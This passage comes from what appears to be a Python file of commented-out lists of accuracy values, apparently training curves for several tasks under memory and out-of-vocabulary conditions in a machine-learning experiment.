0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223]
# y3_mem_oov = [0.5628320392317123, 0.6181038005721291, 0.638332652227217, 0.6670412750306498, 0.6463015937883122, 0.6571311810380057, 0.6873722926031876, 0.6772578667756436, 0.6761340416836943, 0.6823661626481405, 0.6618308132407029, 0.6660196158561504, 0.6660196158561504, 0.6655087862689006, 0.6805271761340417, 0.6695954229668982, 0.6695954229668982, 0.6903351042092358, 0.6860441356763384, 0.6860441356763384, 0.6857376379239886, 0.6927870862280343, 0.6927870862280343, 0.6948304045770332, 0.6857376379239886, 0.6812423375561912, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6920719248058848, 0.6920719248058848, 0.6929914180629342, 0.6929914180629342, 0.6929914180629342]
# Task 4
# y4 = [0.2858776443682104, 0.5763293310463122, 0.5754716981132075, 0.5840480274442539, 0.5897655803316181, 0.6057747284162378, 0.6134934248141796, 0.614065180102916, 0.6406518010291595, 0.6552315608919382, 0.6761006289308176, 0.6946826758147513, 0.7149799885648942, 0.7355631789594054, 0.7504288164665524, 0.7747284162378502, 0.7827329902801601, 0.8047455688965123, 0.8176100628930818, 0.8207547169811321, 0.839622641509434, 0.8453401943967982, 0.8647798742138365, 0.8653516295025729, 0.8653516295025729, 0.8793596340766152, 0.8790737564322469, 0.8916523727844483, 0.8990851915380217, 0.8999428244711264, 0.8999428244711264, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9179531160663236, 0.9179531160663236, 0.9179531160663236, 0.9205260148656375, 0.9205260148656375, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9268153230417381, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977]
# y4_Mem = [0.25718608169440244, 0.3751001156892409, 0.46551570703924533, 0.5311915991812761, 0.5939307644389071, 0.6496395835187327, 0.685948206816766, 0.7067722701788733, 0.7151374922132242, 0.7330248286909318, 0.7426359348580582, 0.7528699830915725, 0.7679985761324197, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7791225416036308, 0.7791225416036308, 0.7791225416036308, 0.7791225416036308, 0.7849959953724304, 0.7846400284773516, 0.7893565898371452, 0.7929162587879327, 0.7934502091305509, 0.7934502091305509, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7968318946337991, 0.7968318946337991, 0.7968318946337991, 0.8028833318501379, 0.8028833318501379, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499]
# y4_mem_oov = [0.5022792022792023, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698]
# Task 5
# y5 = [0.5883791716490923, 0.6328405261441461, 0.6544189585824546, 0.6872486139797804, 0.7207305141863246, 0.7477986737688879, 0.7831286009348842, 0.8062289379280356, 0.8190564191759974, 0.8195999565170127, 0.8360147842156757, 0.8504728774866833, 0.8568866181106642, 0.8568866181106642, 0.8568866181106642, 0.8568866181106642, 0.8638982498097619, 0.8638982498097619, 0.8638982498097619, 0.8638982498097619, 0.8638982498097619, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8654745080987064, 0.8654745080987064, 0.866561582780737, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8667246439830416, 0.8667246439830416, 0.8667246439830416, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838]
# y5_Mem = [0.6921948037830199, 0.80106533318839, 0.8487335579954343, 0.8811283835199478, 0.9046635503859115, 0.927165996303946, 0.938688987933471, 0.9478204152625286, 0.955212523100337, 0.9604848353081856, 0.9694532014349386, 0.43689531470812043, 0.4256984454832047, 0.40123926513751496, 0.43309055332101315, 0.45548429177084465, 0.4885857158386781, 0.5288618328079139, 0.5393521034895097, 0.5756603978693337, 0.5731057723665616, 0.5857701924122187, 0.5798999891292532, 0.5764757038808566, 0.9740732688335688, 0.9740732688335688, 0.9783128600934884, 0.980921839330362, 0.9829872812262203, 0.9848353081856723, 0.9858680291336015, 0.9871181650179367, 0.989183606913795, 0.9914121100119578, 0.9914121100119578, 0.9914664637460594, 0.9927709533644962, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391]
# y5_mem_oov = [0.5905923344947736, 0.6024608013937283, 0.6048562717770035, 0.6070339721254355, 0.5988131533101045, 0.6033863240418118, 0.5970709930313589, 0.584168118466899, 0.6035496515679443, 0.5953288327526133, 0.5976154181184669, 0.600065331010453, 0.6026241289198606, 0.5992486933797909, 0.5983231707317073, 0.5983231707317073, 0.5960365853658537, 0.586345818815331, 0.586345818815331, 0.5932600174216028, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.5965265679442509, 0.5991398083623694, 0.5991398083623694, 0.5974520905923345, 0.5974520905923345, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.6001742160278746, 0.6001742160278746, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.6000108885017421, 0.6000108885017421, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.6003919860627178, 0.6003919860627178, 0.6003919860627178, 0.6003919860627178, 0.6003919860627178, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5973432055749129, 0.5973432055749129, 0.5973432055749129, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 